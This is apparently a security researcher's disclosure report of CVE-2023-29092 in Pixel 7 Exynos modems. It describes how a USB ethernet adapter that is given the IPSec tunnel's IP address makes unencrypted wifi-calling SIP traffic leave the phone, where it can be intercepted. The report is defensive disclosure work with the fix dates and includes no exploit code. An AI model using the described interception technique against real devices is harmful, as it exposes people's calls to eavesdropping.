I have experimentally tested on a Pixel 7 that, if a USB ethernet adapter is inserted after the IPSec interface was created, and the DHCP server assigns the same IP address that is also used for the IPSec tunnel, traffic intended for the IPSec tunnel flows bidirectionally between the baseband and the ethernet adapter - I saw an outgoing SIP connection attempt that I could intercept and reply to. (This requires that the IP address used inside IPSec is IPv4 - I have seen one provider that uses IPv4 inside the IPSec tunnel and another one that uses IPv6.)

I recommend that you give wfc-pkt-router the right interface name somehow instead of letting it search for the right interface based on IP address.

--- Additional Comments ---

Because of the bug, the baseband's SIP connection does *NOT* go through the IPSec tunnel. So the protections provided by IPSec become irrelevant.

The normal flow of data for wifi calling is like this:

1. baseband generates a TCP SYN packet  
2. baseband puts the TCP SYN packet in an unencrypted IP packet  
3. baseband sends the unencrypted IP packet to wfc-pkt-router (on the AP)  
4. wfc-pkt-router sends the unencrypted IP packet to "ipsec*" network interface  
5. Linux kernel IPSec/xfrm layer encrypts the IP packet  
6. Linux kernel sends encrypted IP packet over wifi or whatever

But when the bug is hit, the data flow is instead like this:

1. baseband generates a TCP SYN packet  
2. baseband puts the TCP SYN packet in an unencrypted IP packet  
3. baseband sends the unencrypted IP packet to wfc-pkt-router (on the AP)  
4. wfc-pkt-router sends the unencrypted IP packet to eth0 network interface

So the unencrypted IP packet from the baseband is directly sent out of the phone. The other direction works the same way.

Samsung Device Solution BU's PSIRT (dsprodsec) let me know that they plan to list this in their bulletin as:

CVE-2023-29092  
Improper handling of  parameters while binding network interface  
Exynos Mobile Processor and  Modem  
Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080  
Denial of Service  
Attacker insert malicious configured USB ethernet adapter  
Binding wrong resource can occur due to improper handling of parameters while binding network interface  
3.1 Low CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L

https://source.android.com/docs/security/bulletin/pixel/2023-04-01 says CVE-2023-29092 was fixed at the 2023-04-05 patch level.

This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2023-05-08.

Related CVE Numbers: CVE-2023-29092wasfixedatthe2023-04-05patchlevel,CVE-2023-29092.

Found by: jannh@google.com

Tag

#linux